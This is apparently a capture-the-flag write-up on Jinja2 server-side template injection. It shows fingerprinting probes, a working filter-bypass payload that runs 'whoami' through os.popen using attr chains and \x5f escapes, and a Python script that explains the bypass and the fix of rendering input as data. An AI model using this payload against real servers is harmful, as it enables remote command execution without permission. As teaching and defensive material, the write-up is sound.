Description
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
This is going to be challenging, but we’ve got this because, based on the description…
Using this image, we can probe the site to work out which template engine we are dealing with.
${7*7} didn’t work,
{{7*7}} works → {{7*'7'}} works → Jinja2 or Twig.
The two are told apart by what {{7*'7'}} prints: Jinja2 (Python) repeats the string and returns 7777777, whereas Twig coerces the string to a number and returns 49.
Based on this post, there are several Jinja2 payloads that get around a character filter like this one. The payload below never uses an underscore, a dot or square brackets: attributes are reached through the attr filter, and the dunder names are spelled with \x5f hex escapes, which Jinja2 only decodes when it lexes the string literal, after the sanitizer has already run.
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('whoami')|attr('read')()}}
we’re in!!
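To make the mechanics concrete, here is an added example (not part of the original write-up or the challenge's code) that models the blocklist sanitizer and shows why the posted payload survives it. The blocked character set is an assumption, since the page never lists it; it is simply the set of characters the payload visibly avoids. The script also decodes the string literals the way Jinja2's lexer does, and ends with the pattern that actually fixes the bug: rendering the announcement as template data rather than as template source (that last part needs jinja2 installed and is skipped otherwise).

```python
import codecs
import re

# Assumption: the challenge never says which characters it strips, so this
# blocklist is a constructed stand-in covering the characters the posted
# payload visibly avoids (underscore, dot, square brackets).
BLOCKED_CHARS = set("_.[]")

# Straightforward Jinja2 RCE payload, constructed here for comparison.
NAIVE_PAYLOAD = (
    "{{request.application.__globals__.__builtins__"
    ".__import__('os').popen('whoami').read()}}"
)

# The bypass payload from the write-up: attribute access via the |attr filter,
# dunder names spelled with \x5f escapes instead of literal underscores.
BYPASS_PAYLOAD = (
    "{{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')"
    "|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fbuiltins\\x5f\\x5f')"
    "|attr('\\x5f\\x5fgetitem\\x5f\\x5f')('\\x5f\\x5fimport\\x5f\\x5f')('os')"
    "|attr('popen')('whoami')|attr('read')()}}"
)


def sanitize(user_input: str) -> str:
    """Blocklist 'sanitizer' of the kind the challenge describes: drop bad characters."""
    return "".join(ch for ch in user_input if ch not in BLOCKED_CHARS)


def survives_filter(payload: str) -> bool:
    """True when the filter leaves the payload byte-for-byte intact."""
    return sanitize(payload) == payload


def unescape_jinja_string(token: str) -> str:
    """Decode a quoted Jinja2 string literal the way the Jinja2 lexer does.

    The lexer strips the quotes and runs the body through Python's
    unicode-escape codec, so '\\x5f' turns into '_' only at parse time,
    long after any input filter has looked at the raw text.
    """
    body = token[1:-1]
    return codecs.decode(body.encode("ascii", "backslashreplace"), "unicode_escape")


def attribute_names(payload: str) -> list:
    """Return every decoded string literal the payload feeds to |attr or __getitem__."""
    return [unescape_jinja_string(tok) for tok in re.findall(r"'[^']*'", payload)]


def render_announcement(user_input: str):
    """The fix: user text is passed as a variable, never concatenated into the template.

    The vulnerable app does the equivalent of env.from_string(sanitize(user_input)),
    which makes the announcement template *source*. Here the template is fixed and
    the announcement is data, so {{ ... }} in the input is printed literally.
    Returns None when jinja2 is not installed (it is only needed for this demo).
    """
    try:
        from jinja2 import Environment  # assumption: jinja2 is available
    except ImportError:
        return None
    env = Environment(autoescape=True)
    return env.from_string("Announcement: {{ announcement }}").render(announcement=user_input)


if __name__ == "__main__":
    print("naive payload survives filter:", survives_filter(NAIVE_PAYLOAD))
    print("bypass payload survives filter:", survives_filter(BYPASS_PAYLOAD))
    print("names the engine will actually see:", attribute_names(BYPASS_PAYLOAD))
    print("safe rendering:", render_announcement(BYPASS_PAYLOAD))
```

The takeaway is that the sanitizer and the template lexer disagree about what the input says: the filter sees a harmless-looking string with no underscores, and Jinja2 sees __globals__, __builtins__ and __import__. Character blocklists on template source cannot close that gap; keeping user input out of the template source (or, if untrusted templates are a requirement, a SandboxedEnvironment) does.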
Thanks for reading